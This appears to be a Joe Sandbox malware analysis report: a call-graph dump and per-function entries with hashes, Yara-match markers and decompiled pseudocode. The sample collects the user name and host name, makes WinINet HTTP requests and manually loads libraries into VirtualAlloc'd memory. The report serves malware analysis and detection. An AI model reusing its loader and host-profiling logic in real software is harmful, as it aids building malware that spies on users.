43595->43551 43596->43565 43600 25bf8acf33d 43597->43600 43599 25bf8acf37a 43599->43556 43600->43599 43616 25bf8ad4324 43600->43616 43601->43565 43603 25bf8ac9cfd _dosmaperr 43602->43603 43604 25bf8ac9cdd RtlDeleteBoundaryDescriptor 43602->43604 43603->43565 43604->43603 43605 25bf8ac9cf8 43604->43605 43624 25bf8acc49c RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _getptd_noexit 43605->43624 43607->43565 43609 25bf8acaccd _mtinit _initp_misc_winsig 43608->43609 43609->43579 43610->43583 43612 25bf8ace992 43611->43612 43614 25bf8ace997 43611->43614 43615 25bf8acea40 3 API calls 7 library calls 43612->43615 43615->43614 43617 25bf8ad4339 43616->43617 43620 25bf8ad4356 _callnewh 43616->43620 43618 25bf8ad4347 43617->43618 43617->43620 43623 25bf8acc49c RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _getptd_noexit 43618->43623 43621 25bf8ad436e RtlAllocateHeap 43620->43621 43622 25bf8ad434c 43620->43622 43621->43620 43621->43622 43622->43600 43623->43622 43624->43603 43647 25bf8ac3d24 43625->43647 43627 25bf8abca92 _DllMainCRTStartup 43652 25bf8ac9d18 43627->43652 43629 25bf8abcb51 _DllMainCRTStartup 43630 25bf8ac9d18 malloc 3 API calls 43629->43630 43631 25bf8abcbc9 _DllMainCRTStartup 43630->43631 43664 25bf8ac3994 43631->43664 43648 25bf8ac9d18 malloc 3 API calls 43647->43648 43649 25bf8ac3d45 43648->43649 43650 25bf8ac9d18 malloc 3 API calls 43649->43650 43651 25bf8ac3d4d _recalloc _DllMainCRTStartup 43649->43651 43650->43651 43651->43627 43653 25bf8ac9dac _callnewh 43652->43653 43659 25bf8ac9d30 _callnewh malloc 43652->43659 43678 25bf8acc49c RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _getptd_noexit 43653->43678 43654 25bf8ac9d68 RtlAllocateHeap 43656 25bf8ac9da1 43654->43656 43654->43659 43656->43629 43658 25bf8ac9d91 43676 25bf8acc49c RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _getptd_noexit 43658->43676 43659->43654 43659->43658 43662 25bf8ac9d96 43659->43662 43674 25bf8acc574 RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _NMSG_WRITE _set_error_mode 43659->43674 43675 25bf8acc5e8 3 API calls 6 library calls 43659->43675 43677 25bf8acc49c RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _getptd_noexit 43662->43677 43665 25bf8ac39b2 _DllMainCRTStartup 43664->43665 43679 25bf8ac84e4 RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _DllMainCRTStartup 43665->43679 43667 25bf8ac39dc 43680 25bf8acaf58 RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _getptd 43667->43680 43669 25bf8ac39f3 _DllMainCRTStartup 43681 25bf8ac3b5c 43669->43681 43671 25bf8ac3ac8 _setmbcp _recalloc _DllMainCRTStartup 43690 25bf8ac7ffc RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _setmbcp _DllMainCRTStartup 43671->43690 43673 25bf8ac3b29 43674->43659 43675->43659 43676->43662 43677->43656 43678->43656 43679->43667 43680->43669 43682 25bf8ac3d24 _DllMainCRTStartup 3 API calls 43681->43682 43683 25bf8ac3b85 _DllMainCRTStartup 43682->43683 43684 25bf8ac3bd3 GetUserNameA 43683->43684 43685 25bf8ac3bfc 43684->43685 43691 25bf8abe4ec 43685->43691 43687 25bf8ac3c07 strrchr _DllMainCRTStartup 43696 25bf8aca0cc 43687->43696 43689 25bf8ac3cda _DllMainCRTStartup 43689->43671 43690->43673 43705 25bf8abe544 43691->43705 43693 25bf8abe500 gethostname 43694 25bf8abe51d 43693->43694 43695 25bf8abe50f gethostbyname 43693->43695 43694->43687 43695->43694 43700 25bf8aca0fe _recalloc 43696->43700 43697 25bf8aca103 43707 25bf8acc49c RtlDeleteBoundaryDescriptor RtlAllocateHeap RtlAllocateHeap _getptd_noexit 43697->43707 43699 25bf8aca122 43708 25bf8accd54 3 API calls 12 library calls 43699->43708 43700->43697 43700->43699 43701 25bf8aca108 _invalid_parameter_noinfo 43701->43689 43703 25bf8aca152 43703->43701 43709 25bf8accb20 3 API calls 7 library calls 43703->43709 43706 25bf8abe558 _DllMainCRTStartup 43705->43706 43706->43693 43707->43701 43708->43703 43709->43701 43710 25bf8a75ff4 43711 25bf8a76081 43710->43711 43716 25bf8a769c4 43711->43716 43713 25bf8a76121 43720 25bf8a76d34 43713->43720 43715 25bf8a761b2 43719 25bf8a769fe 43716->43719 43717 25bf8a76af7 43717->43713 43718 25bf8a76ad3 VirtualAlloc 43718->43717 43719->43717 43719->43718 43723 25bf8a76da3 43720->43723 43721 25bf8a76fd1 43721->43715 43722 25bf8a76def LoadLibraryA 43722->43723 43723->43721 43723->43722

                                                                                                                            Executed Functions

                                                                                                                            Function 0000025BF8AC3B5C Relevance: 4.7, APIs: 3, Instructions: 194stringCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: NameUser_snprintfgethostbynamegethostnamemallocstrrchr
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3259335183-0
                                                                                                                            • Opcode ID: 5738243969cd75681ae2df40fc4f50feb926135a9c3fab60068e190284ab21a5
                                                                                                                            • Instruction ID: 1401a1a5a7c9e435818beda5d2c76b98288b2e0004b51a51d60f0254fc071e53
                                                                                                                            • Opcode Fuzzy Hash: 5738243969cd75681ae2df40fc4f50feb926135a9c3fab60068e190284ab21a5
                                                                                                                            • Instruction Fuzzy Hash: 2E51873171CE084FEF49AB6CAC467BA72D2E799311F20452DF18AC36A3DE34D8468755
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ACACB4 Relevance: 3.3, APIs: 2, Instructions: 304COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer_initp_misc_winsig
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2349294043-0
                                                                                                                            • Opcode ID: 17fc2fa0213fe3e3e5c02df0a8a964823dcff32e75d0e2e23afbf98fc9aa3fb0
                                                                                                                            • Instruction ID: fc9cfb5356432d5fccb39f63842349296c15be1b11a6baf5fffa5d95493c45c5
                                                                                                                            • Opcode Fuzzy Hash: 17fc2fa0213fe3e3e5c02df0a8a964823dcff32e75d0e2e23afbf98fc9aa3fb0
                                                                                                                            • Instruction Fuzzy Hash: 4EA1B431618E098FFF54FFB5EC9CAA937E2E768302B10892A940AC3574EA7CD505DB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ABCA74 Relevance: 7.8, APIs: 6, Instructions: 296COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 25bf8abca74-25bf8abcb96 call 25bf8ac3d24 call 25bf8ac3e78 * 3 call 25bf8ac8630 call 25bf8ac8664 call 25bf8ac85dc * 3 call 25bf8ac8664 * 2 call 25bf8ac85dc * 2 call 25bf8ac8630 * 2 call 25bf8ac9d18 call 25bf8ac85dc * 3 call 25bf8ac8664 call 25bf8ac8fc4 call 25bf8abe614 45 25bf8abcb98 call 25bf8ac9104 0->45 46 25bf8abcb9d-25bf8abcbe4 call 25bf8ac8664 call 25bf8ac85dc call 25bf8ac9d18 call 25bf8ac85dc call 25bf8ac3994 0->46 45->46 58 25bf8abcbea-25bf8abcbf3 46->58 59 25bf8abcdb3-25bf8ac911b call 25bf8ac9cd8 call 25bf8ac8664 46->59 61 25bf8abcbfa-25bf8abcca8 call 25bf8ac8bc4 call 25bf8aca0cc call 25bf8ac8bc4 call 25bf8aca0cc * 2 call 25bf8abdfec call 25bf8ac85dc call 25bf8abdf98 58->61 71 25bf8ac911d-25bf8ac9126 call 25bf8ac8664 59->71 72 25bf8ac913e-25bf8ac9147 call 25bf8ac8664 59->72 96 25bf8abccaa-25bf8abccb8 call 25bf8ac8174 61->96 97 25bf8abccc4-25bf8abccc7 61->97 82 25bf8ac9128-25bf8ac9133 71->82 83 25bf8ac9135-25bf8ac913d 71->83 79 25bf8ac9179-25bf8ac9183 72->79 80 25bf8ac9149-25bf8ac9172 72->80 80->79 83->72 96->97 105 25bf8abccba-25bf8abccbf call 25bf8ac657c 96->105 99 25bf8abcd48-25bf8abcd49 97->99 100 25bf8abccc9-25bf8abccec call 25bf8ac462c call 25bf8ac85dc 97->100 101 25bf8abcd4e-25bf8abcd5a call 25bf8abdf6c call 25bf8abe614 99->101 113 25bf8abccf3-25bf8abcd14 call 25bf8ac01a0 call 25bf8ac2e70 call 25bf8ac28fc call 25bf8abe614 100->113 114 25bf8abccee 100->114 115 25bf8abcd61-25bf8abcd69 101->115 116 25bf8abcd5c call 25bf8ac9104 101->116 105->97 137 25bf8abcd16-25bf8abcd19 call 25bf8abe6ac 113->137 138 25bf8abcd1e-25bf8abcd25 113->138 114->113 115->59 119 25bf8abcd6b-25bf8abcd73 115->119 116->115 121 25bf8abcd75-25bf8abcd86 119->121 122 25bf8abcda1 call 25bf8ac09f8 119->122 126 25bf8abcd88-25bf8abcd97 call 25bf8abe5f4 121->126 127 25bf8abcd99 121->127 129 25bf8abcda6-25bf8abcdad 122->129 131 25bf8abcd9b-25bf8abcd9d 126->131 127->131 129->59 129->61 131->122 134 25bf8abcd9f 131->134 134->122 137->138 138->101 140 25bf8abcd27-25bf8abcd46 call 25bf8abdf6c call 25bf8abdfec call 25bf8abe1a0 138->140 140->101
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintffreemalloc$_errno$AllocateHeap_callnewh
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1934227970-0
                                                                                                                            • Opcode ID: ff659012cdeda19b861d5990ca6c7d160011b042850ac3c2daa3d1ec64ebc86a
                                                                                                                            • Instruction ID: 3eb5e79df89371e7edca53e548e7bf0afd6041a1ce2f5ce92b37b8f87a46eadc
                                                                                                                            • Opcode Fuzzy Hash: ff659012cdeda19b861d5990ca6c7d160011b042850ac3c2daa3d1ec64ebc86a
                                                                                                                            • Instruction Fuzzy Hash: 91A1A532704E044BEF5ABB248C5ABBE72D1EB95322F60502DB446C3AE7DF74D8058769
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ABDC5C Relevance: 7.7, APIs: 5, Instructions: 242networkCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _snprintf$CloseHandleHttpInternetOpenRequest_errno_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2188440133-0
                                                                                                                            • Opcode ID: 05ec5b25f3458f0a3abfdab4c8af626020cd5fc4938f23173a15de727656af18
                                                                                                                            • Instruction ID: 2d37c1242bc9b6f5565ead4f89318df51ae006afb13722152b8efe965ac8a755
                                                                                                                            • Opcode Fuzzy Hash: 05ec5b25f3458f0a3abfdab4c8af626020cd5fc4938f23173a15de727656af18
                                                                                                                            • Instruction Fuzzy Hash: 4971D63161CA488BEF19EB28DC896AD73E1FBA5322F10452EF44AC35A1DF34D9018795
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ABDFEC Relevance: 3.2, APIs: 2, Instructions: 157networkCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$ConnectOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2790792615-0
                                                                                                                            • Opcode ID: fc8aec65cb6a2ce55a76e07b02a7604f138a78efeff345bde255f681f149a060
                                                                                                                            • Instruction ID: 191ff033272fe6558daeb4479da8caa74353b73468d6246c6fb07d1a07b35290
                                                                                                                            • Opcode Fuzzy Hash: fc8aec65cb6a2ce55a76e07b02a7604f138a78efeff345bde255f681f149a060
                                                                                                                            • Instruction Fuzzy Hash: 4251B331318A444FEF4ADF28DC9976977D5FB98312F20446DB08BC36A2DB78D9028B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ABE4EC Relevance: 3.0, APIs: 2, Instructions: 39networkCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 329 25bf8abe4ec-25bf8abe50d call 25bf8abe544 gethostname 332 25bf8abe534 329->332 333 25bf8abe50f-25bf8abe51b gethostbyname 329->333 335 25bf8abe536-25bf8abe540 332->335 333->332 334 25bf8abe51d-25bf8abe522 333->334 334->332 336 25bf8abe524-25bf8abe52e 334->336 336->332 337 25bf8abe530-25bf8abe532 336->337 337->335
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: gethostbynamegethostname
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3961807697-0
                                                                                                                            • Opcode ID: 400d05cbf938ceea345569b5e4f4809c0a386e71c0b93fd0065ff311fd89406e
                                                                                                                            • Instruction ID: a3c68e3771791cfe53bf647c435a235d95587262dba2dabe6ff8d307aadc2222
                                                                                                                            • Opcode Fuzzy Hash: 400d05cbf938ceea345569b5e4f4809c0a386e71c0b93fd0065ff311fd89406e
                                                                                                                            • Instruction Fuzzy Hash: 48F09671305D054FFF95DB28AC9863932E1FB98315F141169F409C71A1EB74DC918715
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A76D34 Relevance: 1.6, APIs: 1, Instructions: 149libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E0000025B25BF8A76D34(void* __edi, void* __esi, void* __esp, long long __rcx, signed char __rdx, long long __r8, long long __r9, intOrPtr _a4, long long _a8, signed char _a16, long long _a20, long long _a24, signed char _a28, long long _a32) {
				long long _v4;
				long long _v16;
				long long _v40;
				long long _v44;
				long long _v52;
				long long _v60;
				long long _v64;
				signed long long _v68;
				intOrPtr _v76;
				signed int* _v84;
				long long _v88;
				void* _v92;
				long long _v96;
				intOrPtr _v100;
				long long _v104;
				intOrPtr _v112;
				long long _t131;
				signed long long _t150;
				long long _t169;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_t131 = _a16 + _a24 - 0x40;
				_v88 = _t131;
				_v40 = _a24 + _t131 + 0x88;
				_v64 = _a16 + _v40;
				if ( *((intOrPtr*)(_v64 + 0xc)) == 0) goto 0xf8a76fd1;
				memcpy(__edi, __esi, 0x40);
				r8d = _a28 & 0x000000ff;
				E0000025B25BF8A76284(0x40, _a16 + _v64, _v100);
				LoadLibraryA(??);
				_a20 = _v4;
				_v84 = _a4 + _v76;
				_v92 = _a4 + _v76;
				if ( *_v92 == 0) goto 0xf8a76fbe;
				if (_v84 == 0) goto 0xf8a76f2a;
				if (( *_v84 & 0x00000000) == 0) goto 0xf8a76f2a;
				_t150 = _a20 +  *((intOrPtr*)(_a20 + 0x3c));
				_v68 = _t150;
				_v44 = _v68 + 0x88 + _t150 * 0;
				_v68 = _a20 + _v44;
				_v60 = _a20 + _v68;
				_v60 = _v60 + (( *_v84 & 0x0000ffff) - _v68) * 4;
				 *_v92 = _a20 + _v60;
				goto 0xf8a76f95;
				_v52 = _a4 +  *_v92;
				memcpy(__esi + 0x80, __esi, 0x40);
				r8d = _a16 & 0x000000ff;
				E0000025B25BF8A76284(0x40, _v52 + 2, _v112);
				_t169 = _v16;
				 *((intOrPtr*)(_t169 + 8))();
				 *_v104 = _t169;
				_v104 = _v104 + 8;
				if (_v96 == 0) goto 0xf8a76fb9;
				_v96 = _v96 + 8;
				goto 0xf8a76e3c;
				_v88 = _v88 + 0x14;
				goto 0xf8a76da3;
				return memset(__esi + 0x80, 0, 0x40 << 0);
			}






















                                                                                                                            0x25bf8a76d34
                                                                                                                            0x25bf8a76d39
                                                                                                                            0x25bf8a76d3e
                                                                                                                            0x25bf8a76d43
                                                                                                                            0x25bf8a76d61
                                                                                                                            0x25bf8a76d66
                                                                                                                            0x25bf8a76d84
                                                                                                                            0x25bf8a76d9e
                                                                                                                            0x25bf8a76dac
                                                                                                                            0x25bf8a76dd5
                                                                                                                            0x25bf8a76dd7
                                                                                                                            0x25bf8a76dea
                                                                                                                            0x25bf8a76dfc
                                                                                                                            0x25bf8a76dff
                                                                                                                            0x25bf8a76e1c
                                                                                                                            0x25bf8a76e37
                                                                                                                            0x25bf8a76e45
                                                                                                                            0x25bf8a76e51
                                                                                                                            0x25bf8a76e6f
                                                                                                                            0x25bf8a76e8c
                                                                                                                            0x25bf8a76e8f
                                                                                                                            0x25bf8a76eaa
                                                                                                                            0x25bf8a76ec4
                                                                                                                            0x25bf8a76edf
                                                                                                                            0x25bf8a76f06
                                                                                                                            0x25bf8a76f25
                                                                                                                            0x25bf8a76f28
                                                                                                                            0x25bf8a76f40
                                                                                                                            0x25bf8a76f5b
                                                                                                                            0x25bf8a76f5d
                                                                                                                            0x25bf8a76f70
                                                                                                                            0x25bf8a76f82
                                                                                                                            0x25bf8a76f8a
                                                                                                                            0x25bf8a76f92
                                                                                                                            0x25bf8a76f9e
                                                                                                                            0x25bf8a76fa9
                                                                                                                            0x25bf8a76fb4
                                                                                                                            0x25bf8a76fb9
                                                                                                                            0x25bf8a76fc7
                                                                                                                            0x25bf8a76fcc
                                                                                                                            0x25bf8a76fe5

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: f0d0416421f951180636bdee971ceb80d681f056dbaecdb4e99b1f1a91249793
                                                                                                                            • Instruction ID: 37c733615614be414afb1b3f2aeaa38ceaab6c88a828df5e0f1c0b520b7dc541
                                                                                                                            • Opcode Fuzzy Hash: f0d0416421f951180636bdee971ceb80d681f056dbaecdb4e99b1f1a91249793
                                                                                                                            • Instruction Fuzzy Hash: 66718636219B8486CEA0CB19E89035EB7A0F7C8B94F549125EBCE83B69DF7CD455CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A769C4 Relevance: 1.3, APIs: 1, Instructions: 77memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 356 25bf8a769c4-25bf8a769f8 357 25bf8a769fe-25bf8a76a14 356->357 358 25bf8a76acb-25bf8a76ad1 356->358 357->358 362 25bf8a76a1a-25bf8a76a43 357->362 359 25bf8a76af7-25bf8a76b00 358->359 360 25bf8a76ad3-25bf8a76af2 VirtualAlloc 358->360 360->359 364 25bf8a76a4f-25bf8a76a55 362->364 365 25bf8a76a80-25bf8a76a86 364->365 366 25bf8a76a57-25bf8a76a5c 364->366 365->358 367 25bf8a76a88-25bf8a76ac3 365->367 366->365 368 25bf8a76a5e-25bf8a76a64 366->368 367->358 368->365 369 25bf8a76a66-25bf8a76a7e 368->369 369->364
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 887941e60b476c11782dcb97a24cca0b909baaeecef9bac04b9bb155144e0c7f
                                                                                                                            • Instruction ID: 29b2a58d3713e86f7743172fd1b5506a4070a9f5a99729365c7ef07b04c76dbc
                                                                                                                            • Opcode Fuzzy Hash: 887941e60b476c11782dcb97a24cca0b909baaeecef9bac04b9bb155144e0c7f
                                                                                                                            • Instruction Fuzzy Hash: B931CD73618B4486DB61CB15E84431EBBA0F3C8BA4F144215FA8D83BA8DB7CC594CB04
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0000025BF8ACD810 Relevance: 32.5, APIs: 16, Strings: 2, Instructions: 1030COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                                                                            • String ID: $@
                                                                                                                            • API String ID: 2950348734-1077428164
                                                                                                                            • Opcode ID: 07f065100d3b9576c565e68423642ffc0132d93c0c30c477d6b521816772cb63
                                                                                                                            • Instruction ID: e364ae2fabe4e4aab46307a5c2c10833994dbac5534ceaedbdf50ca17df38b0b
                                                                                                                            • Opcode Fuzzy Hash: 07f065100d3b9576c565e68423642ffc0132d93c0c30c477d6b521816772cb63
                                                                                                                            • Instruction Fuzzy Hash: F2621A32A18E458AFF6A8A18CC493B9B7E1FB57322F34011DF497D39E1D734D8028699
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A7CC10 Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 693COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 57%
                                                                                                                            			E0000025B25BF8A7CC10(void* __ebx, void* __edx, void* __eflags, long long __rbx, long long __rcx, signed int* __rdx, void* __r8, intOrPtr* __r9, long long __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* _t223;
				void* _t224;
				void* _t227;
				void* _t231;
				void* _t234;
				char _t235;
				signed int _t236;
				void* _t240;
				signed int _t241;
				void* _t245;
				signed int _t246;
				signed int _t251;
				signed int _t257;
				void* _t263;
				signed int _t281;
				unsigned int _t298;
				signed int _t309;
				void* _t310;
				signed int _t316;
				signed int _t319;
				unsigned int _t337;
				void* _t338;
				intOrPtr _t348;
				signed int _t375;
				signed int _t381;
				void* _t389;
				char* _t393;
				signed int _t399;
				void* _t423;
				signed long long _t439;
				signed long long _t440;
				intOrPtr _t447;
				char* _t451;
				long long* _t452;
				signed long long _t456;
				intOrPtr _t462;
				void* _t465;
				char* _t467;
				char* _t469;
				char* _t471;
				signed short* _t472;
				void* _t480;
				void* _t481;
				intOrPtr* _t482;
				void* _t513;
				void* _t521;
				signed int* _t524;
				signed int* _t525;
				signed int* _t526;
				signed int* _t527;
				void* _t531;
				void* _t534;
				void* _t535;
				void* _t537;
				signed long long _t538;
				signed long long _t548;
				signed long long _t562;
				signed long long _t574;
				void* _t576;
				intOrPtr* _t578;
				intOrPtr* _t580;
				long long _t583;
				intOrPtr* _t584;
				signed int* _t585;
				void* _t589;
				void* _t591;

				 *((long long*)(_t537 + 0x18)) = __rbx;
				_t535 = _t537 - 0x1e0;
				_t538 = _t537 - 0x2e0;
				_t439 =  *0xf8a9c990; // 0x18002eb3c
				_t440 = _t439 ^ _t538;
				 *(_t535 + 0x1d8) = _t440;
				 *((long long*)(_t538 + 0x68)) = __rcx;
				 *((intOrPtr*)(_t538 + 0x60)) = 0;
				r14d = 0;
				 *(_t538 + 0x54) = 0;
				r12d = 0;
				 *(_t538 + 0x48) = 0;
				 *(_t538 + 0x5c) = 0;
				 *(_t538 + 0x50) = 0;
				E0000025B25BF8A7C0AC(_t440, _t535 - 0x58, __r8);
				E0000025B25BF8A7B89C(_t440);
				r8d = r8d | 0xffffffff;
				r10d = 0;
				 *(_t535 - 0x70) = _t440;
				if (__rcx == 0) goto 0xf8a7d5f0;
				if (( *(__rcx + 0x18) & 0x00000040) != 0) goto 0xf8a7cd2f;
				_t562 = E0000025B25BF8A7F864(__edx, _t440, __rcx);
				if (_t562 + 2 - 1 <= 0) goto 0xf8a7ccde;
				r8d = r8d & 0x0000001f;
				goto 0xf8a7cce1;
				if (( *0x25BF8A9D2B8 & 0x0000007f) != 0) goto 0xf8a7d5f0;
				if (_t562 + 2 - 1 <= 0) goto 0xf8a7cd17;
				goto 0xf8a7cd1e;
				if (( *(_t562 * 0x58 +  *((intOrPtr*)(0x25bf8a5f400 + 0x43e00 + (_t562 >> 5) * 8)) + 0x38) & 0x00000080) != 0) goto 0xf8a7d5f0;
				r8d = r8d | 0xffffffff;
				r10d = 0;
				if (__rdx == 0) goto 0xf8a7d5f0;
				r15b =  *__rdx;
				 *(_t538 + 0x40) = r10d;
				 *(_t538 + 0x44) = r10d;
				 *((long long*)(_t535 - 0x80)) = __r10;
				if (r15b == 0) goto 0xf8a7d608;
				r11d = 0x200;
				 *(_t535 - 0x68) =  &(__rdx[0]);
				if (r10d < 0) goto 0xf8a7d5e7;
				if (_t591 - 0x20 - 0x58 > 0) goto 0xf8a7cd8b;
				goto 0xf8a7cd8e;
				_t480 = r10d + r10d * 8 + r10d;
				_t298 = ( *(_t480 + 0x25bf8a8d980) & 0x000000ff) >> 4;
				 *(_t538 + 0x58) = _t298;
				if (_t298 == 8) goto 0xf8a7d5f0;
				_t337 = _t298;
				if (_t337 == 0) goto 0xf8a7d4a9;
				if (_t337 == 0) goto 0xf8a7d5c3;
				if (_t337 == 0) goto 0xf8a7d573;
				if (_t337 == 0) goto 0xf8a7d537;
				if (_t337 == 0) goto 0xf8a7d52f;
				if (_t337 == 0) goto 0xf8a7d4fa;
				if (_t337 == 0) goto 0xf8a7d41f;
				if (_t337 != 0) goto 0xf8a7d40a;
				_t281 = r15b;
				_t338 = _t281 - 0x64;
				if (_t338 > 0) goto 0xf8a7cf6c;
				if (_t338 == 0) goto 0xf8a7d06d;
				if (_t281 == 0x41) goto 0xf8a7cf41;
				if (_t281 == 0x43) goto 0xf8a7cee7;
				if ((_t480 - 0x00000045 & 0xfffffffd) == 0) goto 0xf8a7cf41;
				if (_t281 == 0x53) goto 0xf8a7ce9b;
				if (_t281 == 0x58) goto 0xf8a7d006;
				if (_t281 == 0x5a) goto 0xf8a7ce53;
				if (_t281 == 0x61) goto 0xf8a7cf4d;
				if (_t281 == 0x63) goto 0xf8a7cef5;
				goto 0xf8a7d278;
